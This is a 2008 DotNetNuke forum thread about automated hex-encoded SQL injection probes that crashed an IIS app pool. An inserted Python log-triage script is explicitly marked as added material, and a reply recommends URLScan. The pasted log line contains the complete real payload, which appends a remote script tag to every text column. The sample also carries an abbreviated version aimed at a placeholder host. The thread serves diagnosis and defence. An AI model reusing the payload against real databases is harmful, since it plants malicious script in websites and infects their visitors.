DotNetNuke Forums

New Post 8/20/2008 4:05 PM
StatisticsIO
22 posts
10th Ranked


SQL Injection Attack acting as DOS on DNN 

I have been getting 500 errors all day and have had to cycle the app pool to fix it. It looks like it is related to the Chinese SQL injection attacks. The SQL injection doesn't work but it knocks IIS over. It looks like the problem happens when they pass the query string to search. Could my host have me throttled in IIS so the pool chokes when a search like this is run? Is there anything I can do?

 

Here is a log excerpt:

2008-08-20 20:10:49 W3SVC293 GENERIC10 66.206.198.97 GET /Home/SearchResults/tabid/37/Default.aspx Search=Statement;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 67.163.214.146 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) .ASPXANONYMOUS=Y99305E5yQEkAAAAMmIwYzEyMmUtOTM2MC00NGU0LTllODQtZjczZWFjYzkzNjY50;+language=en-US - statisticsio.com 200 0 0 34325 1662 1562
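The excerpt above shows the fingerprint of this probe: a DECLARE of a CHAR variable, a CAST of a long 0x... hex blob into it, and an EXEC() of the result, all delivered through the search query string. As an added example (not code from the thread, from DotNetNuke, or from any tool it links to), the following Python script parses IIS W3C log lines in the field order seen in the excerpt, flags that DECLARE/CAST(0x...)/EXEC pattern after URL-decoding the query, decodes the hex blob so an administrator can see what the request tried to run, and tallies probes and 5xx responses per client IP, which is the correlation the poster needs to confirm that failed injections are what is taking the app pool down. The log lines, IP addresses, hostnames and the abbreviated SQL sketch are constructed; the W3C field order is an assumption taken from the excerpt.

```python
"""Triage hex-encoded SQL injection probes in IIS W3C log lines (added example)."""
import re
from collections import defaultdict
from urllib.parse import unquote

# Field order assumed from the log excerpt in the post above (W3C extended format).
IIS_FIELDS = [
    "date", "time", "s-sitename", "s-computername", "s-ip", "cs-method",
    "cs-uri-stem", "cs-uri-query", "s-port", "cs-username", "c-ip", "cs-version",
    "cs(User-Agent)", "cs(Cookie)", "cs(Referer)", "cs-host", "sc-status",
    "sc-substatus", "sc-win32-status", "sc-bytes", "cs-bytes", "time-taken",
]

# The probe's signature: DECLARE a CHAR variable, CAST a 0x.. blob into it, EXEC it.
DECLARE_RE = re.compile(r"DECLARE\s+@\w+\s+N?(?:VAR)?CHAR\(\d+\)", re.I)
HEX_CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\(\d+\)\s*\)", re.I)
EXEC_RE = re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.I)
SCRIPT_SRC_RE = re.compile(r"<script\s+src=[\"']([^\"']+)[\"']", re.I)


def parse_iis_line(line):
    """Split a W3C log line into a dict; IIS never logs a literal space inside a field."""
    parts = line.split()
    if len(parts) != len(IIS_FIELDS):
        return None
    return dict(zip(IIS_FIELDS, parts))


def decode_hex_blob(hex_digits):
    """Turn the CAST(0x..) blob back into text; NCHAR variants carry UTF-16LE."""
    try:
        raw = bytes.fromhex(hex_digits)
    except ValueError:          # odd length or bad digit: truncated log line
        return None
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def analyze_line(line):
    """Return triage details for a hex-CAST injection probe, or None if the line is clean."""
    rec = parse_iis_line(line)
    if rec is None:
        return None
    query = unquote(rec["cs-uri-query"])      # IIS logs spaces in the query as %20
    cast = HEX_CAST_RE.search(query)
    if not (cast and DECLARE_RE.search(query) and EXEC_RE.search(query)):
        return None
    decoded = decode_hex_blob(cast.group(1)) or ""
    return {
        "client_ip": rec["c-ip"],
        "uri": rec["cs-uri-stem"],
        "status": rec["sc-status"],
        "decoded_sql": decoded,
        "script_urls": list(dict.fromkeys(SCRIPT_SRC_RE.findall(decoded))),
    }


def count_by_client(lines):
    """Per source IP: (probes, probes answered with a 5xx), to see the DoS side effect."""
    stats = defaultdict(lambda: [0, 0])
    for line in lines:
        hit = analyze_line(line)
        if hit:
            stats[hit["client_ip"]][0] += 1
            if hit["status"].startswith("5"):
                stats[hit["client_ip"]][1] += 1
    return {ip: tuple(v) for ip, v in stats.items()}


# --- constructed sample data (not from the original thread) --------------------
# Abbreviated, deliberately incomplete sketch of what such blobs decode to; the
# domain is a placeholder.
SAMPLE_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id "
    "exec('update ['+@T+'] set ['+@C+']=['+@C+']+''\"></title>"
    "<script src=\"http://malicious.example/w.js\"></script><!--''')"
)


def make_line(query, status):
    """Build a log line in IIS_FIELDS order using documentation-range addresses."""
    return " ".join([
        "2008-08-20", "20:10:49", "W3SVC1", "WEB01", "192.0.2.10", "GET",
        "/Home/SearchResults/tabid/37/Default.aspx", query, "80", "-", "198.51.100.7",
        "HTTP/1.1", "Mozilla/4.0+(compatible;+MSIE+6.0)", "-", "-", "www.example.com",
        status, "0", "0", "1024", "512", "1500",
    ])


ATTACK_QUERY = ("Search=Statement;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
                + SAMPLE_SQL.encode("latin-1").hex().upper()
                + "%20AS%20CHAR(4000));EXEC(@S);")
ATTACK_LINE = make_line(ATTACK_QUERY, "500")
BENIGN_LINE = make_line("Search=dotnetnuke%20modules", "200")

if __name__ == "__main__":
    hit = analyze_line(ATTACK_LINE)
    print("benign line:", analyze_line(BENIGN_LINE))
    print("probe from", hit["client_ip"], "got status", hit["status"])
    print("payload would load:", hit["script_urls"])
    print(count_by_client([ATTACK_LINE, BENIGN_LINE, ATTACK_LINE]))
```

Run it against a real log with `analyze_line` over each line: a high probe count paired with a high 5xx count from the same source confirms that the failed injections, not legitimate traffic, are what is exhausting the pool, and the decoded blob tells you which site content to check for injected script tags. Since the probes arrive through the query string, a request filter that rejects the CAST(0x pattern before ASP.NET sees it (the URLScan route the reply below points to) stops them without touching the application.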
 

 
New Post 8/20/2008 5:24 PM
cathal connolly
2757 posts
www.cathal.co.uk
5th Ranked

Re: SQL Injection Attack acting as DOS on DNN 

Sadly this has been happening to a number of users recently. It's not a DotNetNuke issue, it's automated robots trying (and in DotNetNuke's case failing) to attack sites via SQL injection. You can read more about this at:

http://www.hanselman.com/blog/HackedAndIDidntLikeItURLScanIsStepZero.aspx

http://twitter.com/haacked (See august 8 entries)

I blogged some more detail about this @ http://www.dotnetnuke.com/Community/Blogs/tabid/825/EntryID/1930/Default.aspx, and link to some tools (URLScan) which should help mitigate against it.

Cathal
